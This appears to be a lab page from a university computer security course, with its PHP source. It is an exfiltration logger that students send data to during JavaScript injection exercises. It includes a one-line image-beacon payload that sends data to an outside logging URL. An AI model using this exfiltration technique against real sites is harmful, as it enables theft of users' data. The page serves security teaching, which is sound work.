You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:
(new Image()).src='https://css.csail.mit.edu/6.5660/2023/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();
The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.
If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
Below are the most recent logged entries, so that you can check if your attack worked:
Mon, 04 Nov 2024 05:55:01 -0500: ZAP: ZAP Sun, 15 Sep 2024 10:31:41 -0400: h: jjjj Wed, 04 Sep 2024 06:54:31 -0400: ZAP: ZAP
In case you are curious, here is the source code of this page.
<?php
header("Access-Control-Allow-Origin: *");
do {
if (!array_key_exists("id", $_REQUEST)) {
break;
}
$id = $_REQUEST['id'];
if (strlen($id) > 1000) {
header("HTTP/1.0 413 Payload Too Large");
echo "ID value is larger than 1000 bytes";
return;
}
if (!array_key_exists("payload", $_REQUEST)) {
header("HTTP/1.0 400 Bad Request");
echo "No payload given";
return;
}
$payload = $_REQUEST['payload'];
if (empty($payload)) {
header("HTTP/1.0 400 Bad Request");
echo "Empty payload given";
return;
}
if (strlen($payload) > 1000) {
header("HTTP/1.0 413 Payload Too Large");
echo "Payload is larger than 1000 bytes";
return;
}
if (!function_exists('apcu_add')) {
header("HTTP/1.0 501 Not Implemented");
echo "APCu not enabled, so no rate limiting; refusing all requests";
return;
}
if (apcu_add($payload, true, 5) === false) {
// exact same $payload was sent in the past 5 seconds
header("HTTP/1.0 429 Too Many Requests");
echo "That exact payload was sent very recently; rejecting";
return;
}
$payload = str_replace(array("\n", "\r"), '.', $payload);
$id = str_replace(array("\n", "\r"), '.', $id);
$file = fopen("/tmp/6.5660-2023-logger.txt", "c+");
if ($file === false) {
header("HTTP/1.0 503 Service Unavailable");
echo "Failed to open log file";
return;
}
if (!flock($file, LOCK_EX)) {
header("HTTP/1.0 503 Service Unavailable");
echo "Failed to lock log file";
return;
}
$lines = array();
while (!feof($file) && count($lines) < 100) {
$lines[] = fgets($file);
}
ftruncate($file, 0);
rewind($file);
fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n");
foreach ($lines as &$line) {
fwrite($file, $line);
}
flock($file, LOCK_UN);
fclose($file);
echo "Logged!";
return;
} while(0);
$link = "(new Image()).src="
. "'https://css.csail.mit.edu/6.5660/2023/labs/log.php?'"
. " + 'id=my-username'"
. " + '&payload=some-string' + '&random='"
. " + Math.random()";
?><!DOCTYPE html>
<html>
<head>
<link rel="stylesheet" type="text/css" href="labs.css" />
<title>Lab 4 Logging Script</title>
</head>
<body>
<h1>Lab 4 Logging Script</h1>
<p>
You can use this server side script to extract data from
client-side JavaScript. For example, clicking this client-side
hyperlink will cause the server to log the payload:
</p>
<pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre>
<p>
The random argument is ignored, but ensures that the browser
bypasses its cache when downloading the image. We suggest that you
use the random argument in your scripts as well. The ID argument
will help you distinguish your log entries from those sent by other
students; we suggest picking your MIT Athena username. Newlines are not
allowed in <tt>javascript:</tt> links; if this bothers you, try
<a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>.
</p>
<h2>Test form</h2>
<p>
If you just want to try out the script, you can use this form.
(For your actual attacks in lab 4, you'll probably want to use the
JavaScript image technique shown above.)
</p>
<form method="GET" action="">
<label for="id">ID:</label><br />
<input name="id" placeholder="your-mit-username" size="40" />
<i>(some identifier to locate your payload in the log)</i>
<br />
<br />
<label for="payload">Payload:</label><br />
<input name="payload" placeholder="some-string" size="40" />
<i>(the information you stole)</i>
<br />
<input type="submit" value="Log" name="log_submit" />
</form>
<h2>Logged entries</h2>
<p>
Below are the most recent logged entries, so that you can check
if your attack worked:
</p>
<pre class="tty"><?php
$lines = file_get_contents("/tmp/6.5660-2023-logger.txt");
echo htmlspecialchars($lines);
?></pre>
<h2>Source code</h2>
<p>In case you are curious, here is the source code of this page.</p>
<pre><?php highlight_file(__FILE__); ?></pre>
</body>
</html>